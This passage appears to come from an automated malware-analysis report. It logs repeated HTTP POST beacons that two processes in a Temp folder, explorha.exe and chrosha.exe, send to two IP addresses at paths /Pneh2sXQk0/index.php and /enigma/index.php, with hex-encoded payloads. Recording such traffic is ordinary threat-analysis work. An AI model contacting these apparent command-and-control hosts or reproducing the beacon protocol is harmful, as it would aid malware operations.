                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:30.656549931 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
134 | 192.168.2.5 | 49970 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:30.480166912 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:30.729028940 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
135 | 192.168.2.5 | 49971 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:31.007756948 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:30:31.255181074 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:31.256380081 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:31.508797884 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.5 | 49972 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:31.081756115 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:30:31.325599909 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.5 | 49974 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:31.692141056 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:30:31.935770035 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
138 | 192.168.2.5 | 49975 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:31.867394924 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:32.117468119 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:32.118637085 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:32.374456882 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139 | 192.168.2.5 | 49976 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:32.182086945 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:32.430222034 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140 | 192.168.2.5 | 49977 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:32.725755930 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:32.974592924 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:32.977405071 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:33.231810093 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
141 | 192.168.2.5 | 49978 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:32.792309999 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:33.039561033 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
142 | 192.168.2.5 | 49979 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:33.289073944 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:33.537179947 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
143 | 192.168.2.5 | 49980 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:33.585074902 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:33.833966017 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:33.835388899 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:34.087327957 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
144 | 192.168.2.5 | 49981 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:33.896821976 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:34.139657974 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
145 | 192.168.2.5 | 49984 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:34.393057108 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:34.645452023 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.5 | 49985 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:34.443819046 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:34.691375971 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:34.692500114 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:34.944919109 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
147 | 192.168.2.5 | 49986 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:35.011377096 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:35.253305912 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
